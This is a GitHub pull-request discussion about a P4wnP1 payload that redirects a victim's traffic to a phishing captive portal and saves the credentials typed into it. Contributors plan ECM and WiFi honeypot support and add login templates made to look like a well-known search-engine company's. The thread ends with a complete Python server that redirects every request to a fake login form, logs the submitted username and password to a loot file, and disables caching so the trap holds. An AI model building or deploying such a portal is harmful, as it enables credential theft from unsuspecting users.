Added Payload #152
Conversation
Payload Captive Portal has been added. Redirects traffic to phishing page and saves collected data to text file.
Looks promising, but why does it only support Windows? It would be nice if you could add some legit-looking templates and support ECM and maybe WiFi (changes to the core would have to be made so it can set up an open hotspot). Setup would still be possible through Bluetooth. Also, I would not hardcode the IP addresses; use the variables from setup.cfg ($IF_IP for example). |
I'm working on the ECM support; as for WiFi, I'll have to look into it. |
OK. And Apache and PHP are kind of heavy requirements, so it would be nice if you could replace them with something like a modified Python HTTP server. |
Sure, I'll try to add the ECM and $IF_IP in the next commit, but Python and WiFi will take another commit after that since I have my gripes with Python servers. P.S.: Just a quick question: can I use $active_interface with ECM (or at all, since I couldn't get it working on RNDIS either), since some Linux systems seem to use the enp* adapter naming system? |
P4wnP1 runs on Raspbian, so as far as I know, using $active_interface should work fine. Some Linux distros (like Kali) have drivers for ECM and RNDIS, but that should not cause any trouble since one gets disabled after a connection was established. The OS/Linux flavor of the target shouldn't matter, since the only "code" running on the target is the served HTML. |
Apache2 seems to be fine in this case, as it is manually started by this payload. As long as the service isn't globally enabled, it shouldn't have an impact on the boot time of other payloads. It should be mentioned that something similar could be achieved with Responder forcing HTTP basic auth on every HTTP request. Regarding the payload: I very much appreciate receiving a first payload commit. Author notice and credits for the author of the original script are in place. I hope some folks are able to test this before I merge, because I'm not able to test it myself during the next days. |
Uses the $IF_IP variable from setup.cfg instead of a specific IP, so an IP changed in setup.cfg is used by the payload. Also added experimental ECM; may work, may not work. Basically WIP.
I've added the IP variable, but ECM seems to not work with ROUTE_SPOOF; it still looks for a gateway at my router's IP (which on my Kali VM is disconnected). If not that, it will fail to redirect to the Pi's IP. |
ECM works now. Kinda obvious in the title.
Minor change in process to make the payload a little more organised.
ECM now works. The last thing I'll be working on for this payload is the WiFi honeypot. I still need to figure out how to change the DNS server of a phone, but it shouldn't be too long before I get the WiFi working. I'm kind of sceptical about using HTML login templates since they may have licensing issues, but I'll try pushing a free one into this branch. Really hope people like it. |
You can make a guide on how to modify the html locally so people can make their own captive portals from proprietary websites. |
As stated, I'm involved in some other tasks, which don't allow me to work on P4wnP1 right now. Anyway, as I'm preparing some talks (including WiFi security), I have a solution ready, including code and a template for a custom captive portal: https://github.com/mame82/awareness_wifi?files=1 I'm planning to move everything over to P4wnP1 (excluding the Karma attack, as the nexmon firmware needs to be patched) as soon as I have time to. Feel free to use the template meanwhile, but please don't include the backdoored app. |
Added a pretty legit-looking portal that looks like something made by a certain search engine company (゜‿ ^). Also updated README.MD with appropriate credits.
I added a more legit portal now, so it should look like something made by a more reputable company and not some guy in his basement. Credits and license are included too. Also, mame, the README for the WiFi talks has a few typos. |
@mame82 is the core still in development or am I free to add some new features in the meantime? |
@Swiftb0y not able to review PRs for next 3 weeks |
@Swiftb0y, you tried the payload yet? I want to know if anything is glitchy. |
Sorry, I'm currently not able to connect the Pi to the Internet. I may be able to get that to work again this week. |
Anyone have any progress testing or any suggestions? |
@Brisk4t Yes, I have tested the new payload. It would be nice if, once credentials are stored, the P4wnP1 disconnects itself (I don't know if this is possible). |
Thanks, I'll try to add that. Any bugs that you know of? |
Yes, not sure how or why, but sometimes the browser will jump between the P4wnP1 page and the actual site. Maybe if the website was previously cached? |
Yeah, that's caching alright, unless you can use the site properly. |
Payload Captive Portal has been added. Redirects traffic to the phishing page and saves collected data to a text file. Uses the RNDIS attack method with optional supplementary methods.
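Added example, not code from this PR or from the P4wnP1 project: a small Python 3 captive-portal server of the kind suggested in the thread as a lighter replacement for Apache/PHP. It answers every request that is not for the portal page with a 302 to a login page on the Pi's own IP, appends submitted form fields to a text file, and sets no-cache headers on every response so the victim's browser does not fall back to a previously cached copy of the real site (the page-jumping behaviour reported above). Route/DNS redirection is left to the payload's own ROUTE_SPOOF setup. The IP (taken from an IF_IP environment variable, with a constructed fallback address), the /login path, the loot file location and the form field names are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Minimal captive-portal HTTP server (added example, not the PR's payload)."""
import os
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Assumptions: the payload reads $IF_IP from setup.cfg; here it comes from the
# environment, with a constructed fallback. Path and loot file are also assumed.
PORTAL_IP = os.environ.get("IF_IP", "172.16.0.1")
PORTAL_PATH = "/login"
LOOT_FILE = os.environ.get("LOOT_FILE", "/tmp/captive_portal_loot.txt")

# Constructed placeholder form; a real template would be served from disk.
PORTAL_HTML = b"""<html><body><form method="post" action="/login">
<input name="user"><input name="pass" type="password">
<input type="submit" value="Sign in"></form></body></html>"""

# Sent on every response so the browser never reuses a cached copy of the
# real site (the cause of the "jumping" between portal and real page).
NO_CACHE_HEADERS = (
    ("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"),
    ("Pragma", "no-cache"),
    ("Expires", "0"),
)


def redirect_target(host_header, path):
    """Return the portal URL to redirect to, or None if the request already
    targets the portal page on the Pi's IP (Host may carry a :port suffix)."""
    host = (host_header or "").split(":")[0]
    if host == PORTAL_IP and urlparse(path).path == PORTAL_PATH:
        return None
    return f"http://{PORTAL_IP}{PORTAL_PATH}"


def parse_credentials(body):
    """Turn an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def record_credentials(creds, client_ip, loot_file=LOOT_FILE, now=None):
    """Append one timestamped line per submission to the loot file; return it."""
    ts = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(now))
    fields = " ".join(f"{k}={v}" for k, v in sorted(creds.items()))
    line = f"{ts} {client_ip} {fields}\n"
    with open(loot_file, "a", encoding="utf-8") as fh:
        fh.write(line)
    return line


class PortalHandler(BaseHTTPRequestHandler):
    def _send(self, code, body=b"", extra=()):
        self.send_response(code)
        for name, value in NO_CACHE_HEADERS + tuple(extra):
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        # Any URL the OS/browser probes for connectivity lands here and is
        # bounced to the portal; only the portal path itself gets the form.
        target = redirect_target(self.headers.get("Host"), self.path)
        if target:
            self._send(302, extra=(("Location", target),))
        else:
            self._send(200, PORTAL_HTML, (("Content-Type", "text/html"),))

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", "replace")
        record_credentials(parse_credentials(body), self.client_address[0])
        # Send the victim onwards so the form is not shown a second time.
        self._send(302, extra=(("Location", "http://example.com/"),))

    def log_message(self, fmt, *args):
        pass  # keep the headless Pi's console quiet


if __name__ == "__main__":
    HTTPServer((PORTAL_IP, 80), PortalHandler).serve_forever()
```

Run it as root on the Pi (port 80) after the payload's routing is in place; with this in the loop, the "jump back to the real site" symptom can only come from the redirect layer, not from the browser cache.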